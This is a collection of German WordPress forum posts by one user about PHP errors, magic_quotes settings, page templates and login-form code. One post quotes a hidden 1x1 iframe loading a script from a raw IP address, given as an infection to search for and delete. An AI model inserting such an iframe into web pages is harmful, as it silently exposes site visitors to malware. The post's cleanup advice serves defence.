Beiträge von mfitzen

    Das ist es definitiv auch nicht. Auto Saves werden bei mir auch nur alle 3 Minuten gemacht.

    Seit meiner Meldung von heute Morgen hatte ich aber keinerlei Probleme mehr. Ich beobachte nebenbei auch mal meinen "normalen" Blog. Dort habe ich Deinen Patch noch nicht eingebaut. Mal sehen wo der Fehler zuerst wieder auftaucht.

    Den Link zur phpinfo wollte alphawolf doch haben... naja, ich kann ihn auch wieder rausnehmen.

    Mann... Wär ich doch auch nur so´n Crack, dann könnte ich mich auch mal selber auf die Suche machen...:|

    Also das time limit kann nicht weiter erhöht werden (wegen shared server). So viel dann schonmal dazu.

    Das einzige was ich in der phpinfo unter loaded modules von den beiden genannten Sachen sehen kann ist mod_php5. fast_cgi kann ich nicht ausfindig machen.

    Die dritte Fehlermeldung spricht ja eine eindeutige Sprache. Die ersten beiden Meldungen könnten Resultate daraus sein.

    Ist es nicht eher so, dass die 3. Meldung aus den ersten beiden resultiert? Die execution_time steht bei mir auf 30. Ich lasse es mal erhöhen. Aber ich denke auch nicht, dass es daran liegen wird. Dann hätte ich bestimmt auch mit so manchen aufwendigen Plugins Probleme, oder?!

    Aber nochmal zurück zu dem Patch: Es könnte vielleicht doch noch klappen. Ich war ein bisschen voreilig und habe vergessen den Browsercache zu leeren. Ich denke er hatte dann noch die gecachte stream.php beansprucht. Hab´s gerade nachgeholt und beobachte es nochmal.

    Können wir gerne mal machen. Das Problem wird nur sein, dass der Fehler halt sporadisch auftritt und man so den Erfolg bzw. Misserfolg nur schwer beobachten kann. Die letzten Tage hatte ich eigentlich wieder Ruhe. Lediglich gestern Mittag kam es wieder häufiger zu diesen Fehlermeldungen, weswegen ich diesen Thread dann auch nochmal bemüht habe.

    Ich wünsche dann erstmal angenehme Nachtruhe ;-)

    Code
    set_magic_quotes_runtime(0);

    Somit gilt das sowohl fürs öffentliche Blog als auch fürs Backend.

    Ergebnis: ich kann trotz per php.ini eingeschaltetem magic_quotes_runtime wieder das Blog und auch den Login und DashBoard benutzen. ...Definitiv macht es aber die de_DE.mo Files beim Einlesen kaputt, denn diese PHP Option modifiziert Dateizugriffe und somit den Inhalt der *.mo Dateien beim Einlesen, da diese teilweise Binärdaten enthalten, deren 0x0000 in "\0" umgewandelt werden, was die Fehler dann erzeugt.

    Kannst Du mir das nochmal für Laien erklären? Wenn ich die oben erwähnte Zeile in die wp-config einfüge, zerschießt es mir dann die Sprachdatei, oder wie darf ich das verstehen?

    Wäre super wenn Du es schaffen würdest, Dir das mal genauer anzusehen. Erst gestern habe ich dieses Plugin für die Realisierung eines Gästebuchs eingesetzt. :-|

    Nachtrag zu meinem vorherigen Beitrag: Beim PHPKit (seinerzeit auch bekannt als eine große Sicherheitslücke) war es möglich, durch modifizierte Avatare (unter Punkt 5) Schadcode einzuschleusen. Mich hat es wie gesagt damals selbst getroffen und es lief genau wie hier in einem vorherigen Posting beschrieben. Wäre es denkbar, dass sowas auch bei WordPress passieren könnte?

    Wie bist Du vorgegangen? So wie´s aussieht versuchst Du das Template im Textbereich des Editors aufzurufen (oder wo kommt der exec-php Fehler her?). Erstelle einfach eine normale Textdatei. Füge dort den obigen Code ein. Danach speicherst Du das ganze z.B. als links.php ab und lädst die Datei in Deinen Themeordner. Dann erstellst Du in WP eine neue Seite ohne Inhalt (lediglich den Titel der Seite eingeben), wählst dann unter Seitentemplates die "Linkseite" aus. Nach dem Speichern sollte die neue Seite in Deiner Navigation erscheinen und alle Links ausspucken, die angelegt wurden.

    zu 1: Ist glaube ich nicht so einfach, wenn Du die Texte auf Seiten unterbringen möchtest. Texte verkürzen ist ja normalerweise ne Angelegenheit für den More-Tag, aber ob´s da ne Möglichkeit gibt, dass der Text dann direkt innerhalb der Seite angezeigt wird weiss ich nicht. Vielleicht ist sowas mit Ajax machbar.

    zu 2: Dafür gibt´s ein schönes Plugin. Nähere Infos zum Page-Link-Manager gibt´s auf texto.de

    Hatte ähnliches Problem mal mit nem anderen CMS. Durchsuche mal die Dateien nach folgendem Code:

    Code
    <iframe src="http://58.65.235.41/llll/stds/go.php?sid=1" style="visibility: hidden; position: absolute;" height="1" width="1">
    </iframe>

    Diesen solltest Du dann löschen (vorausgesetzt er lässt sich finden). Danach sind unbedingt alle Zugangsdaten zu ändern (WP Installation, Datenbank, FTP Server). Damit hast Du dann schonmal nen Schritt in die richtige Richtung gemacht. Kann Dir leider nicht versprechen, dass Du den Code irgendwo findest. Könnte auch irgendwo in der Datenbank stecken. Auf jeden Fall auch mal die Verzeichnisrechte überprüfen. Infos dazu solltest Du eigentlich hier im Forum finden. Sollten meine Tipps nicht helfen oder falsch sein, wird einer der Moderaten oder der anderen User Dir sicherlich weiterhelfen können. Das wären zumindest die Schritte, die ich als erstes einleiten würde...

    PS: Oft findet sich die Ursache für solche Trojaner oder Viren auch in unsauber programmierten Plugins. Eventuell auch mal die Dateien durchsuchen.

    EDIT: Da war jemand schneller ;-) Ich sollte mir abgewöhnen so viel zu schreiben :-D

    So, hab´s hinbekommen. Stell´s mal hier rein, vielleicht kann´s irgendjemand mal brauchen. Der folgende Code liefert ein Login-Formular, dass nach dem Login ein paar Quicklinks bereitsstellt (kann vom User-Level abhängig gemacht werden - hier rot markiert).

    Funktioniert bei mir soweit einwandfrei. Verbesserungsvorschläge werden aber gerne angenommen ;-) Danke nochmal El-Q!

    Super, Danke! Ich war schon nah dran, hatte aber den Teil hinter der bloginfo URL nochmal in Anführungsstriche gepackt, weshalb es nicht funktionierte... Naja, jetzt weiss ich bescheid. Vielen Dank!

    Ich habe nun noch Links zu den wichtigsten WP Funktionen wie Schreiben oder Links anlegen eingebaut. Lassen sich diese auch je nach Userlevel anzeigen? D.h. ein registrierter Leser bekommt nur den Link zum Profil, ein Autor bekommt den Link zum Profil, zum Verfassen von Beiträgen etc.

    Danke für den obigen Code! Konnte ich gerade gut gebrauchen. Eine Frage hätte ich aber noch. Du schreibst:

    PHP
    <a href="http://www.schoool.ch/faq/#9">Anmelde-Daten vergessen &raquo;</a>
    
    
    und
    
    
    <a href="http://www.schoool.ch/wp-admin/post-new.php"><?php _e('Beitrag verfassen'); ?></a>

    Lässt sich die URL mit dem http auch abfragen, sodass ich diese nicht von Hand einbauen muss? Ich hoffe Du / ihr versteht was ich meine. :confused: